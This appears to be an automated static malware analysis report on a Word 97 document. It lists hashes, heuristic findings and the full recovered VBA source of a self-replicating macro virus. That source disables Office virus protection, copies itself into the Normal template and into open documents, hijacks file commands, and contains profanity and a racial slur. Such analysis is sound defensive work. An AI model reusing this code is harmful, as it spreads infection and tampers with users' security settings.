Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5267fced1b09266…

MALICIOUS

Office (OLE)

65.5 KB Created: 2000-09-20 04:03:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-19
MD5: 17c46c1abf71c31e3b876f26207e2bb0 SHA-1: 49385d779b1c9ea83ab6443746aaa3052d6b190d SHA-256: c5267fced1b09266895872d2357ba7e9d36402d66a8e1437eb193692cdf98a5f
178 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, and exhibits markers associated with legacy WordBasic macro viruses. The script attempts to disable virus protection and displays a message to the user, suggesting a malicious intent to manipulate security settings or trick the user. The presence of 'ToolsMacro' and 'ViewVbCode' subroutines that call 'ToolsMacro' indicates an attempt to interfere with macro security or analysis.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 67,072 bytes but its declared streams total only 26,532 bytes — 40,540 bytes (60%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Recovered VBA macro source from orphaned project info OLE_ORPHANED_VBA_MACRO_SOURCE
    oletools recovered no VBA project, but VBA source-cache records (module names, API calls, dropped paths and literal source lines) survive in unallocated OLE space — a stripped or corrupted VBA project, typical of legacy Word 97 macro viruses. The macro source was recovered and carved for review and signature scanning.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
vba_orphaned_source.txt vba-orphaned-source analyzer.wordbasic.recover_length_prefixed_source (VBA source-cache records recovered from a stripped/orphaned project in unallocated OLE space) 845 bytes
SHA-256: e42d794d0b9b5644ad2bdf2dbec81e169b0e79776260a97fd0834ac4ed15a7be
Preview script
First 1,000 lines of the extracted script
ThisDocument
Fuck
Project
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VBA\VBA332.DLL
VBA
C:\Program Files\Microsoft Office\Office\MSWORD8.OLB
Word
C:\WINDOWS\SYSTEM\stdole2.tlb
stdole
C:\WINDOWS\SYSTEM\MSForms.TWD
MSForms
C:\WINDOWS\TEMP\VBE\MSForms.EXD
C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\MSO97.DLL
Office
ShowMessage
Bablas
ToolsMacro
ViewVbCode
FileTemplates
HelpAbout
ToolsOptions
ChangeCap
RestoreCap
OpenMyMacro
SikatDocument
SikatTemplate
AutoExit
FileOpen
AutoOpen
AutoClose
FileClose
FileSave
Ancurin
AutoExec
Virus macro sedang aktif
(Hapus normal.dot kalo pengin selamat)
Name
Fuck
ThisDocument
Deleting 
 Macro in Normal Template...
Copying da phunk freaka From 
 to Normal Template...
Macrosoft Word
 Macro in 
...
Copying da phunk freaka From Normal Template to 
Macro created 10/02/99 by  Abdul Aziz
Normal.NewMacros.Cegat
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5446 bytes
SHA-256: 6519a0452f42df7f1250c7546fe9fa1bec1bb85d72be3ce1c044676e63d30a70
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Fuck"
' Fuck version 1.0
' Created on May 21 1998
' Hope ya like it
Sub ShowMessage()
    H = Time
    If (WeekDay(Date) = vbFriday Or WeekDay(Date) = vbSunday) And Time < TimeValue("12:00:00") Then
    For i = 1 To 100
        Beep
    Next i
    H = MsgBox("Virus makro ini gampang ngilanginnya" & Chr(34) & _
    "Hapus aja file normal.dot" & Chr(34) & "," & Chr(13) & "gampang kan..." & Chr(13) & _
    "Kalo tetap nggak bisa... ya udah... diinstall ulang..." & Chr(13) & _
    "Kalo masih nggak bisa... jual aja" & Chr(13) & Chr(13) & "Bye bye... beware of Macrosoft Word 97" & _
    Chr(13) & "(Ma'af mengganggu.)", vbOKOnly + vbExclamation, "Take care")
    End If
End Sub

Sub Bablas()
Attribute Bablas.VB_Description = "Macro created 10/02/99 by  Abdul Aziz"
Attribute Bablas.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Cegat"
    Options.SaveNormalPrompt = False
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
End Sub

Sub ToolsMacro()
    H = MsgBox("Sorry ... ya dont have da rights", vbExclamation + vbOKOnly)
End Sub

Sub ViewVbCode()
    ToolsMacro
End Sub

Sub FileTemplates()
    ToolsMacro
End Sub

Sub HelpAbout()
    H = MsgBox("This Macrosoft Word (TM) program is licensed to :" & Chr(13) & Chr(13) & _
    "Gangsta Niggaz", vbOKOnly + vbExclamation, "da phunk freaka... infoLab")
End Sub

Sub ToolsOptions()
    Options.SaveNormalPrompt = True
    Options.SavePropertiesPrompt = True
    Options.VirusProtection = True
    Dialogs(wdDialogToolsOptions).Show
    Bablas
End Sub

Sub ChangeCap()
    On Error Resume Next
    Application.Caption = "Virus macro sedang aktif"
    ActiveWindow.Caption = "(Hapus normal.dot kalo pengin selamat)"
End Sub

Sub RestoreCap()
    On Error Resume Next
    Application.Caption = "Macrosoft Word"
    ActiveWindow.Caption = ActiveDocument.Name
End Sub

Sub OpenMyMacro()
    If InputBox("Enter password", "da phunk freaka") = "azizoke" Then Application.ShowVisualBasicEditor = True
End Sub

Sub SikatDocument()
    Dim DocOk As Boolean
    DocOk = False
    
    
    For Each obj In ActiveDocument.VBProject.VBComponents
        If obj.Name = "Fuck" Then DocOk = True
        If obj.Name <> "Fuck" And obj.Name <> "ThisDocument" Then
            Application.StatusBar = "Deleting " + obj.Name + _
            " Macro in " + ActiveDocument.Name + "..."
            Application.OrganizerDelete Source:=ActiveDocument.FullName, _
            Name:=obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next obj
    If DocOk = False Then
        Application.StatusBar = "Copying da phunk freaka From Normal Template to " _
        + ActiveDocument.Name + "..."
       Application.OrganizerCopy Source:=NormalTemplate.FullName, _
        Destination:=ActiveDocument, Name:="Fuck", Object:=wdOrganizerObjectProjectItems
    End If
End Sub

Sub SikatTemplate()
    Dim NorOk As Boolean
    NorOk = False
    For Each obj In NormalTemplate.VBProject.VBComponents
        If obj.Name = "Fuck" Then NorOk = True
        If obj.Name <> "Fuck" And obj.Name <> "ThisDocument" Then
            Application.StatusBar = "Deleting " + obj.Name + _
            " Macro in Normal Template..."
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next obj
    If NorOk = False Then
        Application.StatusBar = "Copying da phunk freaka From " + ActiveDocument.Name + _
        " to Normal Template..."
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="Fuck", Object:=wdOrganizerObjectProjectItems
        Application.DisplayRecentFiles = False
        Application.DisplayRecentFiles = True
    End If
End Sub

Sub AutoExit()
    ShowMessage
    Application.quit
End Sub

Sub FileOpen()
    ChangeCap
    WordBasic.DisableAutoMacros True
    On Error Resume Next
    If Dialogs(wdDialogFileOpen).Show <> 0 Then
        SikatDocument
        ActiveDocument.Save
    End If
    RestoreCap
    WordBasic.DisableAutoMacros False
End Sub

Sub AutoOpen()
    Bablas
    ChangeCap
    SikatTemplate
    On Error Resume Next
    NormalTemplate.Save
    RestoreCap
End Sub

Sub AutoClose()
    SikatDocument
End Sub

Sub FileClose()
    AutoClose
End Sub

Sub FileSave()
    If ActiveDocument.Saved = False Then
        SikatDocument
        SikatTemplate
        On Error Resume Next
        ActiveDocument.Save
        ActiveDocument.Saved = True
    End If
End Sub

Sub Ancurin()
    C = Documents.Count
    If C <> 0 Then
        Normal.Fuck.SikatDocument
        WordBasic.DisableAutoMacros False
        On Error Resume Next
        If ActiveDocument.Name <> "Document1" Then ActiveDocument.Save
    Else: Application.OnTime Now + TimeValue("00:00:07"), "Normal.Fuck.Ancurin"
    End If
End Sub

Sub AutoExec()
    WordBasic.DisableAutoMacros True
    Bablas
    Application.OnTime Now + TimeValue("00:00:07"), "Normal.Fuck.Ancurin"
End Sub